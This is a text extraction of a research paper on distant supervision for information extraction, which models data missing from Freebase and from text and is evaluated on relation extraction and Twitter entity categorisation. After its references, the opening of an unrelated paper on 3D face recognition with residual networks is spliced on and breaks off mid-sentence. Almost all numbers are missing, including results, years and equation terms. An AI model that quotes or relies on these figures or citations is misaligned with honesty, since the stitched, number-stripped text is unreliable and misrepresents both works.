results conclusions & future work acknowledgements references modeling missing data in distant supervision for information extraction alan ritter machine learning department carnegie mellon university rittera@cs.cmu.edu luke zettlemoyer, mausam computer sci. & eng. university of washington {lsz,mausam}@cs.washington.edu oren etzioni vulcan inc. seattle, wa orene@vulcan.com abstract distant supervision algorithms learn informa- tion extraction models given only large read- ily available databases and text collections. most previous work has used heuristics for generating labeled data, for example assum- ing that facts not contained in the database are not mentioned in the text, and facts in the database must be mentioned at least once. in this paper, we propose a new latent-variable approach that models missing data. this pro- vides a natural way to incorporate side in- formation, for instance modeling the intuition that text will often mention rare entities which are likely to be missing in the database. de- spite the added complexity introduced by rea- soning about missing data, we demonstrate that a carefully designed local search approach to inference is very accurate and scales to large datasets. experiments demonstrate im- proved performance for binary and unary re- lation extraction when compared to learning with heuristic labels, including on average a % increase in area under the precision re- call curve in the binary case. introduction this paper addresses the issue of missing data (lit- tle and rubin, ) in the context of distant super- vision. the goal of distant supervision is to learn to process unstructured data, for instance to extract binary or unary relations from text (bunescu and mooney, ; snyder and barzilay, ; wu and weld, ; mintz et al., ; collins and singer, ), using a large database of propositions as a person employer bibb latané unc chapel hill tim cook apple susan wojcicki google true positive “bibb latané, a professor at the university of north carolina at chapel hill, published the theory in .” false positive “tim cook praised apple’s record revenue...” false negative “john p. mcnamara, a professor at washington state university’s department of animal sciences...” figure : a small hypothetical database and heuris- tically labeled training data for the employer rela- tion. distant source of supervision. in the case of binary relations, the intuition is that any sentence which mentions a pair of entities (e and e ) that partici- pate in a relation, r, is likely to express the proposi- tion r(e ,e ), so we can treat it as a positive training example of r. figure presents an example of this process. one question which has received little attention in previous work is how to handle the situation where information is missing, either from the text corpus, or the database. as an example, suppose the pair of entities (john p. mcnamara, washington state uni- versity) is absent from the employer relation. in this case, the sentence in figure (and others which mention the entity pair) is effectively treated as a negative example of the relation. this is an issue transactions of the association for computational linguistics, ( ) – . action editor: kristina toutanova. submitted / ; revised / ; published / . c© association for computational linguistics. of practical concern, as most databases of interest are highly incomplete - this is the reason we need to extend them by extracting information from text in the first place. we need to be cautious in how we handle miss- ing data in distant supervision, because this is a case where data is not missing at random (nmar). whether a proposition is observed or missing in the text or database depends heavily on its truth value: given that it is true we have some chance to ob- serve it, however we do not observe those which are false. to address this challenge, we propose a joint model of extraction from text and the process by which propositions are observed or missing in both the database and text. our approach provides a natural way to incorporate side information in the form of a missing data model. for instance, popular entities such as barack obama already have good coverage in freebase, so new extractions are more likely to be errors than those involving rare entities with poor coverage. our approach to missing data is general and can be combined with various ie solutions. as a proof of concept, we extend multir (hoffmann et al., ), a recent model for distantly supervised information extraction, to explicitly model missing data. these extensions complicate the map inference problem which is used as a subroutine in learning. this motivated us to explore a variety of approaches to inference in the joint extraction and missing data model. we explore both exact inference based on a* search and efficient approximate inference using local search. our experiments demonstrate that with a carefully designed set of search operators, local search produces optimal solutions in most cases. experimental results demonstrate large perfor- mance gains over the heuristic labeling strategy on both binary relation extraction and weakly super- vised named entity categorization. for example our model obtains a % increase in area under the pre- cision recall curve on the sentence-level relation ex- traction task. related work there has been much interest in distantly su- pervised training of relation extractors using also referred to as weakly supervised databases. for example, craven and kumlien ( ) build a heuristically labeled dataset, using the yeast protein database to label pubmed abstracts with the subcellular-localization relation. wu and weld ( ) heuristically annotate wikipedia articles with facts mentioned in the infoboxes, enabling auto- mated infobox generation for articles which do not yet contain them. benson et. al. ( ) use a database of music events taking place in new york city as a source of distant supervision to train event extractors from twitter. mintz et. al. ( ) used a set of relations from freebase as a distant source of supervision to learn to extract information from wikipedia. ridel et. al. ( ), hoffmann et. al. ( ), and surdeanu et. al. ( ) presented a series of models casting distant supervision as a multiple-instance learning problem (dietterich et al., ). recent work has begun to address the challenge of noise in heuristically labeled training data gen- erated by distant supervision, and proposed a va- riety of strategies for correcting erroneous labels. takamatsu et al. ( ) present a generative model of the labeling process, which is used as a pre- processing step for improving the quality of labels before training relation extractors. independently, xu et. al. ( ) analyze a random sample of sentences from the new york times, demon- strating that most entity pairs expressing a freebase relation correspond to false negatives. they apply pseudo-relevance feedback to add missing entries in the knowledge base before applying the multir model (hoffmann et al., ). min et al. ( ) extend the miml model of surdeanu et. al. ( ) using a semi-supervised approach assuming a fixed proportion of true positives for each entity pair. the min et al. ( ) approach is perhaps the most closely related of the recent approaches for dis- tant supervision. however, there are a number of key differences: ( ) they impose a hard constraint on the proportion of true positive examples for each entity pair, whereas we jointly model relation extrac- tion and missing data in the text and kb. ( ) they only handle the case of missing information in the database and not in the text. ( ) their model, based on surdeanu ( ), uses hard discriminative em to tune parameters, whereas we use perceptron-style updates. ( ) we evaluate various inference strategies for exact and approximate inference. the issue of missing data has been extensively studied in the statistical literature (little and rubin, ; gelman et al., ). most methods for han- dling missing data assume that variables are missing at random (mar): whether a variable is observed does not depend on its value. in situations where the mar assumption is violated (for example dis- tantly supervised information extraction), ignoring the missing data mechanism will introduce bias. in this case it is necessary to jointly model the process of interest (e.g. information extraction) in addition to the missing data mechanism. another line of related work is iterative semantic bootstrapping (brin, ; agichtein and gravano, ). carlson et. al. ( ) exploit constraints be- tween relations to reduce semantic drift in the boot- strapping process; such constraints are potentially complementary to our approach of modeling miss- ing data. a latent variable model for distantly supervised relation extraction in this section we review the multir model (due to hoffmann et. al. ( )) for distant supervision in the context of extracting binary relations. this model is extended to handle missing data in section . we focus on binary relations to keep discussions concrete; unary relation extraction is also possible. given a set of sentences, s = s ,s , . . . ,sn, which mention a specific pair of entities (e and e ) our goal is to correctly predict which relation is mentioned in each sentence, or “na” if none of the relations under consideration are mentioned. un- like the standard supervised learning setup, we do not observe the latent sentence-level relation men- tion variables, z = z ,z , . . . ,zn. instead we only observe aggregate binary variables for each rela- tion, d = d ,d , . . . ,dk, which indicate whether the proposition rj(e ,e ) is present in the database (freebase). of course the question which arises is: how do we relate the aggregate-level variables, dj, to the sentence-level relation mentions, zi? a sensi- ble answer to this question is a simple deterministic- or function. the deterministic-or states that if these variables indicate which relation is mentioned be- tween e and e in each sentence. there exists at least one i such that zi = j, then dj = . for example, if at least one sentence men- tions that “barack obama was born in honolulu”, then that fact is true in aggregate, if none of the sen- tences mentions the relation, then the fact is assumed false. the model also makes the converse assump- tion: if freebase contains the relation birthloca- tion(barack obama, honolulu), then we must ex- tract it from at least one sentence. a summary of this model, which is due to hoffmann et. al. ( ), is presented in figure . . learning to learn the parameters of the sentence-level rela- tion mention classifier, θ, we maximize the likeli- hood of the facts observed in freebase conditioned on the sentences in our text corpus: θ∗ = arg max θ p(d|s;θ) = arg max θ ∏ e ,e ∑ z p(z,d|s;θ) here the conditional likelihood of a given entity pair is defined as follows: p(z,d|s;θ) = n∏ i= φ(zi,si;θ)× k∏ j= ω(z,dj) = n∏ i= eθ·f(zi,si) × k∏ j= ¬dj⊕∃i:j=zi where x is an indicator variable which takes the value if x is true and otherwise, the ω(z,dj) factors are hard constraints corresponding to the deterministic-or function, and f(zi,si) is a vector of features extracted from sentence si and relation zi. an iterative gradient-ascent based approach is used to tune θ using a latent-variable perceptron- style additive update scheme (collins, ; liang et al., ; zettlemoyer and collins, ). the gradient of the conditional log likelihood, for a sin- gle pair of entities, e and e , is as follows: ∂ log p(d|s;θ) ∂θ = ep(z|s,d;θ)   ∑ j f(sj,zj)   −ep(z,d|s;θ)   ∑ j f(sj,zj)   for details see koller and friedman ( ), chapter . 𝑠 𝑠 𝑠 … 𝑠𝑛 𝑧 𝑧 𝑧 … 𝑧𝑛 𝑑 𝑑 𝑑𝑘 … local extractors deterministic or (barack obama, honolulu) sentences aggregate relations (born-in, lived-in, children, etc…) 𝑃 𝑧𝑖 = 𝑟 𝑠𝑖 ∝ exp⁡(𝜃 ⋅ 𝑓 𝑠𝑖, 𝑟 ) relation mentions figure : multir (hoffmann et. al. ) 𝑠 𝑠 𝑠 … 𝑠𝑛 𝑧 𝑧 𝑧 … 𝑧𝑛 𝑡 𝑡 𝑡𝑘 … mentioned in db 𝑑 𝑑 𝑑𝑘 … mentioned in text figure : dnmar these expectations are too difficult to compute in practice, so instead they are approximated as maxi- mizations. computing this approximation to the gra- dient requires solving two inference problems corre- sponding to the two maximizations: z∗db = arg max z p(z|s,d;θ) z∗ = arg max z p(z,d|s;θ) the map solution for the second term is easy to compute: because d and z are deterministically re- lated, we can simply find the highest scoring re- lation, r, for each sentence, si, according to the sentence-level factors, φ, independently. the first term, is more difficult, however, as this requires find- ing the best assignment to the sentence-level hidden variables z = z . . .zn conditioned on the observed sentences and facts in the database. hoffmann et. al. ( ) show how this reduces to a well-known weighted edge cover problem which can be solved exactly in polynomial time. modeling missing data the model presented in section makes two as- sumptions which correspond to hard constraints: . if a fact is not found in the database it cannot be mentioned in the text. . if a fact is in the database, it must be mentioned in at least one sentence. these assumptions drive the learning, however if there is information missing from either the text or the database this leads to errors in the training data (false positives, and false negatives respectively). in order to gracefully handle the problem of miss- ing data, we propose to extend the model presented in section by splitting the aggregate level vari- ables, d, into two parts: t which represents whether a fact is mentioned in the text (in at least one sen- tence), and d′ which represents whether the fact is mentioned in the database. we introduce pair- wise potentials ψ(tj,dj) which penalize disagree- ment between tj and dj, that is: ψ(tj,dj) =    −αmit if tj = and dj = −αmid if tj = and dj = otherwise where αmit (missing in text) and αmid (missing in database) are parameters of the model which can be understood as penalties for missing information in the text and database respectively. we refer to this model as dnmar (for distant supervision with data not missing at random). a graphical model representation is presented in figure . this model can be understood as relaxing the two hard constraints mentioned above into soft con- straints. as we show in section , simply relaxing these hard constraints into soft constraints and set- ting the two parameters αmit, and αmid by hand on development data results in a large improvement to precision at comparable recall over multir on two different applications of distant supervision: binary relation extraction and named entity categorization. inference in this model becomes more challeng- ing however, because the constrained inference problem no longer reduces to a weighted edge cover problem as before. in section , we present an infer- ence technique for the new model which is time and memory efficient and almost always finds an exact map solution. the learning proceeds analogously to what was described in section . , with the exception that we now maximize over the additional aggregate-level hidden variables t, which have been introduced. as before, map inference is a subroutine in learning, both for the unconstrained case corresponding to the second term (which is again trivial to compute), and for the constrained case which is more challenging as it no longer reduces to a weighted edge cover problem as before. map inference the only difference in the new inference problem is the addition of t; z and t are deterministically re- lated, so we can simply find a map assignment to z, from which t follows. the resulting inference prob- lem can be viewed as optimization under soft con- straints, where the objective includes terms for each fact not in freebase which is extracted from the text: −αmid, and an effective reward for extracting a fact which is contained in freebase: αmit. the solution to the map inference problem is the value of z which maximizes the following objective: z∗db = arg max z p(z|d;θ,α) = arg max z n∑ i= θ ·f(zi,si) ( ) + k∑ j= ( αmit dj∧∃i:j=zi −αmid ¬dj∧∃i:j=zi ) whether we choose to set the parameters αmit and αmid to fixed values (section ), or incorporate side information through a missing data model (sec- tion ), inference becomes more challenging than in the model where facts observed in freebase are treated as hard constraints (section ); the hard con- straints are equivalent to setting αmid = αmit = ∞. we now present exact and approximate ap- proaches to inference. standard search methods such as a* and branch and bound have high com- putation and memory requirements and are there- fore only feasible on problems with few variables; they are, however, guaranteed to find an optimal so- lution. approximate methods scale to large prob- each entity pair defines an inference problem where the lem sizes, but we loose the guarantee of finding an optimal solution. after showing how to find guaran- teed exact solutions for small problem sizes (e.g. up to variables), we present an inference algorithm based on local search which is empirically shown to find optimal solutions in almost every case by com- paring its solutions to those found by a*. . a* search we cast exact map inference in the dnmar model as an application of a* search. each partial hypoth- esis, h, in the search space corresponds to a par- tial assignment of the first m variables in z; to ex- pand a hypothesis, we generate k new hypotheses, where k is the total number of relations. each new hypothesis h′ contains the same partial assignment to z , . . . ,zm as h, with each h′ having a different value of zm+ = r. a* operates by maintaining a priority queue of hypotheses to expand, with each hypothesis’ priority determined by an admissible heuristic. the heuristic represents an upper bound on the score of the best solution with h’s partial variable assignment under the objective from equation . in general, a tighter upper bound corresponds to a better heuristic and faster solutions. to upper bound our objective, we start with the φ(zi,si) factors from the partial as- signment. unassigned variables (i > k), are set to their maximum possible value, zi = maxr φ(r,si) independently. next to account for the effect the aggregate ψ(tj,dj) factors on the unassigned vari- ables, we consider independently changing each unassigned zi variable for each ψ(tj,dj) factor to improve the overall score. this approach can lead to inconsistencies, but provides us with a good upper bound for the best possible solution with a partial assignment to z , . . . ,zk. . local search while a* is guaranteed to find an exact solution, its time and memory requirements prohibit use on large problems involving many variables. as a more scal- able alternative we propose a greedy hill climbing method (russell et al., ), which starts with a full assignment to z, and repeatedly moves to the best neighboring solution z′ according to the objective in number of variables is equal to the number of sentences which mention the pair. equation . the neighborhood of z is defined by a set of search operators. if none of the neighboring solutions has a higher score, then we have reached a (local) maximum at which point the algorithm ter- minates with the current solution which may or may not correspond to a global maximum. this process is repeated using a number of random restarts, and the best local maximum is returned as the solution. search operators: we start with a standard search operator, which considers changing each relation-mention variable, zi, individually to maxi- mize the overall score. at each iteration, all zis are considered, and the one which produces the largest improvement to the overall score is changed to form the neighboring solution, z′. unfortunately, this definition of the solution neighborhood is prone to poor local optima because it is often required to traverse many low scoring states before changing one of the aggregate variables, tj, and achieving a higher score from the associated aggregate factor, ψ(tj,dj). for example, consider a case where the proposition r(e ,e ) is not in freebase, but is men- tioned many times in the text, and imagine the cur- rent solution contains no mention zi = r. any neighboring solution which assigns a mention to r will include the penalty αmid, which could out- weigh the benefit from changing any individual zi to r: φ(r,si) −φ(zi,si). if multiple mentions were changed to r however, together they could outweigh the penalty for extracting a fact not in freebase, and produce an overall higher score. to avoid the problem of getting stuck in local optima, we propose an additional search operator which considers changing all variables, zi, which are currently assigned to a specific relation r, to a new relation r′, resulting in an additional (k − ) possible neighbors, in addition to the n × (k − ) neighbors which come from the standard search op- erator. this aggregate-level search operator allows for more global moves which help to avoid local op- tima, similar to the type-level sampling approach for mcmc (liang et al., ). at each iteration, we consider all n × (k − ) + (k− ) possible neighboring solutions generated by both search operators, and pick the one with biggest overall improvement, or terminate the algorithm if no improvements can be made over the current so- lution. random restarts were used for each infer- ence problem. we found this approach to almost al- ways find an optimal solution. in over , prob- lems with or fewer variables from the new york times dataset used in section , an optimal solu- tion was missed in only cases which was verified by comparing against optimal solutions found using a*. without including the aggregate-level search operator, local search almost always gets stuck in a local maximum. incorporating side information in section , we relaxed the hard constraints made by multir, which allows for missing information in either the text or database, enabling errors in the distantly supervised training data to be naturally corrected as a side-effect of learning. we made the simplifying assumption, however, that all facts are equally likely to be missing from the text or database, which is encoded in the choice of fixed parameters αmit, and αmid. is it possible to im- prove performance by incorporating side informa- tion in the form of a missing data model (little and rubin, ), taking into account how likely each fact is to be observed in the text and the database conditioned on its truth value? in our setting, the missing data model corresponds to choosing the val- ues of αmit and αmid dynamically based on the en- tities and relations involved. popular entities: consider two entities: barack obama, the th president of the united states, and donald parry, a professional rugby league footballer of the s. since obama is much more well- known than parry, we wouldn’t be very surprised to see information missing from freebase about parry, but it would seem odd if true propositions were miss- ing about obama. we can encode these intuitions by choosing entity-specific values of αmid: α (e ,e ) mid = −γ min (c(e ),c(e )) where c(ei) is the number of times ei appears in freebase, which is used as an estimate of its cov- erage. well aligned relations: given that a pair of en- tities, e and e , participating in a freebase relation, http://en.wikipedia.org/wiki/donald_ parry r, appear together in a sentence si, the chance that si expresses r varies greatly depending on r. for example, if a sentence mentions a pair of entities which participate in both the countrycapitol relation and the locationcontains relation (for example moscow and russia), it is more likely that the a random sentence will express locationcon- tains than countrycapitol. we can encode this preference for matching cer- tain relations over others by setting αrmit on a per-relation basis. we choose a different value of αrmit for each relation based on quick inspec- tion of the data, and estimating the number of true positives. relations such as contains, place lived, and nationality which contain a large number of true positive matches are assigned a large value of αrmit = γlarge, those with a medium number such as capitol, place of death and administrative divisions were assigned a medium value γmedium, and those relations with few matches were assigned a small value γsmall. these parameters were tuned on held out development data. experiments in section , we presented a scalable approach to inference in the dnmar model which almost al- ways finds an optimal solution. of course the real question is: does modeling missing data improve performance at extracting information from text? in this section we present experimental results showing large improvements in both precision and recall on two distantly supervised learning tasks: binary rela- tion extraction and named entity categorization. . binary relation extraction for the sake of comparison to previous work we evaluate performance on the new york times text, features and freebase relations developed by riedel et. al. ( ) which was also used by hoffmann et. al. ( ). this dataset is constructed by extracting named entities from . million new york times ar- ticles, which are then match against entities in free- base. sentences which contain pairs of entities par- ticipating in one or more relations are then used as training examples for those relations. the sentence- level features include word sequences appearing in context with the pair of entities, in addition to part of speech sequences, and dependency paths from the malt parser (nivre et al., ). . . baseline to evaluate the effect of modeling missing data in distant supervision, we compare against the mul- tir model for distant supervision (hoffmann et al., ), a state of the art approach for binary rela- tion extraction which is the most similar previous work, and models facts in freebase as hard con- straints disallowing the possibility of missing infor- mation in either the text or the database. to make our experiment as controlled as possible and rule- out the possibility of differences in performance due to implementation details, we compare against our own re-implementation of multir which reproduces hoffmann et. al.’s performance, and shares as much code as possible with the dnmar model. . . experimental setup we evaluate binary relation extraction using two evaluations. we first evaluate on a sentence-level extraction task using a manually annotated dataset provided by hoffmann et. al. ( ). this dataset consists of sentences paired with human judgments on whether each expresses a specific relation. sec- ondly, we perform an automatic evaluation which compares propositions extracted from text against held-out data from freebase. . . results sentential extraction: figure presents preci- sion and recall curves for the sentence-level relation extraction task on the same manually annotated data presented by hoffmann et. al. ( ). by explic- itly modeling the possibility of missing information in both the text and the database we achieve a % increase in area under the precision recall curve. in- corporating additional side information in the form of a missing data model, as described in section , produces even better performance, yielding a % increase over the baseline in area under the curve. we also compare against the system described by xu et. al. ( ) (hereinafter called xu ). to do this, we trained our implementation of multir on http://raphaelhoffmann.com/mr/ . . . . . . . . . . . . recall p re ci si o n multir xu dnmar dnmar* figure : overall precision and recall at the sentence-level extraction task comparing against human judgments. dnmar∗ incorporates side- information as discussed in section . the labels predicted by their pseudo-relevance feed- back model. the differences between each pair of systems, except dnmar and xu , is significant with p-value less than . according to a paired t- test assuming a normal distribution. per-relation precision and recall curves are pre- sented in figure . for certain relations, for instance /location/us state/capital, there simply isn’t enough overlap between the information contained in free- base and facts mentioned in the text to learn any- thing useful. for these relations, entity pair matches are unlikely to actually express the relation; for in- stance, in the following sentence from the data: nhpf , which has its louisiana office in baton rouge , gets the funds ... although baton rouge is the capital of louisiana, the /location/us state/capital relation is not ex- pressed in this sentence. another interesting ob- servation which we can make from figure , is that the benefit from modeling missing data we thank wei xu for making this data available. dnmar has a . % increase in auc over xu , though this difference is not significant according to a paired t-test. dnmar* achieves a % increase in auc over xu which is significant. . . . . . . . . . . . . . . recall p re ci si o n multir dnmar dnmar* figure : aggregate-level automatic evaluation comparing against held-out data from freebase. dnmar∗ incorporates side-information as dis- cussed in section . varies from one relation to another. some re- lations, for instance /people/person/place of birth, have relatively good coverage in both freebase and the text, and therefore we do not see as much gain from modeling missing data. other rela- tions, such as /location/location/contains, and /peo- ple/person/place lived have poorer coverage making our missing data model very beneficial. aggregate extraction: following previous work, we evaluate precision and recall against held- out data from freebase in figure . as mentioned by mintz et. al. ( ), this automatic evaluation un- derestimates precision because many facts correctly extracted from the text are missing in the database and therefore judged as incorrect. riedel et. al. ( ) further argues that this evaluation is biased because frequent entity pairs are more likely to con- tain facts in freebase, so systems which rank extrac- tions involving popular entities higher will achieve better performance independently of how accurate their predictions are. indeed in figure we see that the precision of our system which models missing data is generally lower than the system which as- sumes no data is missing from freebase, although we do roughly double the recall. by better modeling . . . . . . . . . . . . business_company_founders recall p re ci si o n . . . . . . . . . . . . business_person_company recall p re ci si o n . . . . . . . . . . . . location_country_administrative_divisions recall p re ci si o n . . . . . . . . . . . . location_country_capital recall p re ci si o n . . . . . . . . . . . . location_location_contains recall p re ci si o n . . . . . . . . . . . . location_neighborhood_neighborhood_of recall p re ci si o n . . . . . . . . . . . . location_us_state_capital recall p re ci si o n . . . . . . . . . . . . people_deceased_person_place_of_death recall p re ci si o n . . . . . . . . . . . . people_person_children recall p re ci si o n . . . . . . . . . . . . people_person_nationality recall p re ci si o n . . . . . . . . . . . . people_person_place_lived recall p re ci si o n . . . . . . . . . . . . people_person_place_of_birth recall p re ci si o n figure : per-relation precision and recall on the sentence-level relation extraction task. the dashed line corresponds to multir, dnmar is the solid line, and dnmar*, which incorporates side-information, is represented by the dotted line. missing data we achieve lower precision on this au- tomatic held-out evaluation as the system using hard constraints is explicitly trained to predict facts which occur in freebase (not those which are mentioned in the text but unlikely to appear in the database). . named entity categorization as mentioned previously, the problem of missing data in distant (weak) supervision is a very general issue; so far we have investigated this problem in the context of extracting binary relations using distant supervision. we now turn to the problem of weakly supervised named entity recognition (collins and singer, ; talukdar and pereira, ). . . experimental setup to demonstrate the effect of modeling missing data in the distantly supervised named entity cate- gorization task, we adapt the multir and dnmar models to the twitter named entity categorization dataset which was presented by ritter et. al. ( ). the models described so far are applied unchanged: rather than modeling a set of relations in freebase between a pair of entities, e and e , we now model a set of possible freebase categories associated with a single entity e. this is a natural extension of dis- tant supervision from binary to unary relations. the unlabeled data and features described by ritter et. al. ( ) are used for training the model, and their manually annotated twitter named entity dataset is used for evaluation. . . results precision and recall at weakly supervised named entity categorization comparing multir against dn- mar is presented in figure . we observe substan- tial improvement in precision at comparable recall by explicitly modeling the possibility of missing in- formation in the text and database. the missing data model leads to a % increase in area under the precision-recall curve (from . to . ), but still falls short of the results presented by ritter et. al. ( ). intuitively this makes sense, because the model used by ritter et. al. is based on latent dirich- let allocation which is better suited to this highly am- biguous unary relation data. . . . . . . . . . . . . recall p re ci si o n ner_multir ner_dnmar figure : precision and recall at the named entity categorization task conclusions in this paper we have investigated the problem of missing data in distant supervision; we introduced a joint model of information extraction and miss- ing data which relaxes the hard constraints used in previous work to generate heuristic labels, and pro- vides a natural way to incorporate side information through a missing data model. efficient inference breaks in the new model, so we presented an ap- proach based on a* search which is guaranteed to find exact solutions, however exact inference is not computationally tractable for large problems. to ad- dress the challenge of large problem sizes, we pro- posed a scalable inference algorithm based on local search, which includes a set of aggregate search op- erators allowing for long-distance jumps in the so- lution space to avoid local maxima; this approach was experimentally demonstrated to find exact so- lutions in almost every case. finally we evaluated the performance of our model on the tasks of binary relation extraction and named entity categorization showing large performance gains in each case. in future work we would like to apply our ap- proach to modeling missing data to additional mod- els, for instance the model of surdeanu et. al. ( ) and ritter et. al. ( ), and also explore new miss- ing data models. acknowledgements the authors would like to thank dan weld, chris quirk, raphael hoffmann and the anonymous re- viewers for helpful comments. thanks to wei xu for providing data. this research was supported in part by onr grant n - - - , darpa contract fa - - c- , a gift from google, a gift from vulcan inc., and carried out at the univer- sity of washington’s turing center. references eugene agichtein and luis gravano. . snowball: extracting relations from large plain-text collections. in proceedings of the fifth acm conference on digital libraries. edward benson, aria haghighi, and regina barzilay. . event discovery in social media feeds. in pro- ceedings of acl. sergey brin. . extracting patterns and relations from the world wide web. in the world wide web and databases. razvan bunescu and raymond mooney. . learning to extract relations from the web using minimal super- vision. in acl. andrew carlson, justin betteridge, bryan kisiel, burr settles, estevam r hruschka jr, and tom m mitchell. . toward an architecture for never-ending lan- guage learning. in proceedings of aaai. michael collins and yoram singer. . unsupervised models for named entity classification. in emnlp. michael collins. . discriminative training meth- ods for hidden markov models: theory and experi- ments with perceptron algorithms. in proceedings of emnlp. mark craven, johan kumlien, et al. . constructing biological knowledge bases by extracting information from text sources. in ismb. thomas g dietterich, richard h lathrop, and tomás lozano-pérez. . solving the multiple instance problem with axis-parallel rectangles. artificial intel- ligence. andrew gelman, john b carlin, hal s stern, and don- ald b rubin. . bayesian data analysis. crc press. raphael hoffmann, congle zhang, xiao ling, luke zettlemoyer, and daniel s. weld. . knowledge- based weak supervision for information extraction of overlapping relations. in proceedings of acl-hlt. d. koller and n. friedman. . probabilistic graphi- cal models: principles and techniques. mit press. percy liang, alexandre bouchard-côté, dan klein, and ben taskar. . an end-to-end discriminative ap- proach to machine translation. in proceedings of acl. percy liang, michael i jordan, and dan klein. . type-based mcmc. in proceedings of acl. roderick j a little and donald b rubin. . statis- tical analysis with missing data. john wiley & sons, inc., new york, ny, usa. bonan min, ralph grishman, li wan, chang wang, and david gondek. . distant supervision for rela- tion extraction with an incomplete knowledge base. in proceedings of naacl-hlt. mike mintz, steven bills, rion snow, and dan jurafsky. . distant supervision for relation extraction with- out labeled data. in proceedings of acl-ijcnlp. joakim nivre, johan hall, and jens nilsson. . memory-based dependency parsing. in proceedings of conll. sebastian riedel, limin yao, and andrew mccallum. . modeling relations and their mentions without labeled text. in proceedings of ecml/pkdd. sebastian riedel, limin yao, andrew mccallum, and benjamin m marlin. . relation extraction with matrix factorization and universal schemas. in pro- ceedings of naacl-hlt. alan ritter, sam clark, mausam, and oren etzioni. . named entity recognition in tweets: an experi- mental study. proceedings of emnlp. stuart j. russell, peter norvig, john f. candy, jiten- dra m. malik, and douglas d. edwards. . ar- tificial intelligence: a modern approach. benjamin snyder and regina barzilay. . database- text alignment via structured multilabel classification. in proceedings of ijcai. mihai surdeanu, julie tibshirani, ramesh nallapati, and christopher d. manning. . multi-instance multi- label learning for relation extraction. in proceedings of emnlp-conll. shingo takamatsu, issei sato, and hiroshi nakagawa. . reducing wrong labels in distant supervision for relation extraction. in proceedings acl. partha pratim talukdar and fernando pereira. . experiments in graph-based semi-supervised learning methods for class-instance acquisition. in proceedings of acl. fei wu and daniel s. weld. . autonomously se- mantifying wikipedia. in proceedings of cikm. wei xu, raphael hoffmann le zhao, and ralph grish- man. . filling knowledge base gaps for distant supervision of relation extraction. in proceedings of acl. luke s. zettlemoyer and michael collins. . online learning of relaxed ccg grammars for parsing to logical form. in emnlp-conll. submitted july accepted october published december corresponding author siming zheng, gs @student.upm.edu.my academic editor klara kedem additional information and declarations can be found on page doi . /peerj-cs. copyright zheng et al. distributed under creative commons cc-by . open access d texture-based face recognition system using fine-tuned deep residual networks siming zheng , rahmita wirza ok rahmat , fatimah khalid and nurul amelina nasharuddin casd, department of multimedia, putra malaysia university, sedang, malaysia c - casd, department of multimedia, putra malaysia university, sedang, malaysia c - , department of multimedia, putra malaysia university, sedang, malaysia c - , department of multimedia, putra malaysia university, sedang, malaysia abstract as the technology for d photography has developed rapidly in recent years, an enormous amount of d images has been produced, one of the directions of research for which is face recognition. improving the accuracy of a number of data is crucial in d face recognition problems. traditional machine learning methods can be used to recognize d faces, but the face recognition rate has declined rapidly with the increasing number of d images. as a result, classifying large amounts of d image data is time- consuming, expensive, and inefficient. the deep learning methods have become the focus of attention in the d face recognition research. in our experiment, the end- to-end face recognition system based on d face texture is proposed, combining the geometric invariants, histogram of oriented gradients and the fine-tuned residual neural networks. the research shows that when the performance is evaluated by the frgc-v dataset, as the fine-tuned resnet deep neural network layers are increased, the best top- accuracy is up to . % and the top- accuracy is . %. the framework proposed costs less iterations than traditional methods. the analysis suggests that a large number of d face data by the proposed recognition framework could significantly improve recognition decisions in realistic d face scenarios. subjects computer vision, graphics, multimedia keywords d textures, face recognition system, histogram of oriented gradients features, deep learning, residual neural networks, fine-tuning, tensorboard introduction with the rapid development of the internet, smart computing equipment and social networking applications are increasingly used. there are hundreds of millions of d images uploaded every day to platforms such as snapchat and alipay, on which a large number of d face images are generated. three main problems in creating d face recognition systems that many researchers report are the d face pose, illumination changes, and variations in facial expression. extracting better features are a key process for d face recognition (bagchi, bhattacharjee & nasipuri, ; zhang et al., ; nagi et al., ; wang et al., ; zhu et al., ). furthermore, shallow learning (such as machine learning) including only one or no layer of hidden units leads to lack of ability to deal with large-scale data. these challenges have caused persistent problems for the robustness and reliability of such how to cite this article zheng s, rahmat rwok, khalid f, nasharuddin na. . d texture-based face recognition system using fine- tuned deep residual networks. peerj comput. sci. :e http://doi.org/ . /peerj-cs. https://peerj.com/computer-science mailto:gs @student.upm.edu.my https://peerj.com/academic-boards/editors/ https://peerj.com/academic-boards/editors/ http://dx.doi.org/ . /peerj-cs. http://creativecommons.org/licenses/by/ . / http://creativecommons.org/licenses/by/ . / http://doi.org/ . /peerj-cs. systems, which has driven many researchers to use deep learning for d face recognition tasks. when deep learning methods are applied in realistic d face scenarios, two challenges confronted are as follows: firstly, the accuracy becomes unstable as d face images are added; this is because different deep learning networks have different generalization ability extracting images features. when processing a large number of image data, the deeper the layers of deep learning model are, the more problems such as gradient vanishing and gradient exploration will be caused. secondly, as more and more complex deep learning models will be applied to the actual scenario, the recognition rate may be affected by the depth of a complex model. in this article we explore both issues. how to recognize a large number of d face graphics with high precision is the main task of this article. in this work, the primary objective of the approaches we propose is to create a d textures-based end-to-end face recognition system with a high recognition accuracy, a satisfied performance and robustness while remaining practical. in this system, we have developed a residual neural network model base on resnet for the d face recognition task. this model is fine-tuned with different depths using hog featured d face textures. the primary aim is to solve problems of gradient vanishing and gradient exploration. we trained fine-tuned resnet models with different depths using hog based d texture images to maintain faster calculations and a high accuracy of image growth. the remainder of this work is prepared as follows. ‘related works’ reminds the related work. ‘materials & methods’ presents methodology of extraction of hog features and the fine-tuning resnet model. ‘experiment’ shows the experimentation, results and discussion is described in ‘results and discussion’. the conclusions are finally stated in ‘conclusions’. related works deep learning algorithms have received increasing attention in the face recognition field, and many researchers discovered the importance of studying d face recognition (maiti, sangwan & raheja, ; min et al., ; pabiasz, starczewski & marvuglia, ; porro-munoz et al., ; hu et al., ; sun et al., ; wu, hou & zhang, ; tang et al., ; zhang, zhang & liu, ). on one hand, extracting d face information is the key step in d face recognition: effective face detection and alignment can increase the overall performance of d face recognition, which is critical in both security and commercial d face recognition systems. on the other hand, researchers have proposed some methods for exploiting and exerting the deep learning for d face recognition, and they have demonstrated that the performance of deep learning systems is significantly better than that of machine learning method in the case of a large amount of d images. in recent years, the convolutional neural network (cnn) models have been used for d face recognition. hu et al. ( ) has proposed a method of customizing convolutional neural networks. her cnn’s layer configuration uses the same principle to design based on the lecun model (lecun et al., ). the structure of her model, called cnn- , comprises one convolutional layer, one pooling layer, and a × filter. however, this structure cannot effectively extract and analyze d face data. when the learning rate rose zheng et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . 